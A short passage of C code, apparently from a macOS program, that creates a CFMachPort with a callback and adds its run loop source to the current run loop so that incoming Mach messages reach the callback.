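	CFRunLoopSourceRef	source;

	/* Wrap a freshly allocated receive right in a CFMachPort. */
	port = CFMachPortCreate(NULL, callback, &context, NULL);
	if (port == NULL)
		return;

	/* Deliver incoming Mach messages to the callback on this run loop. */
	source = CFMachPortCreateRunLoopSource(NULL, port, 0);
	CFRunLoopAddSource(CFRunLoopGetCurrent(), source, kCFRunLoopDefaultMode);

	CFRelease(source);
	CFRelease(port);
}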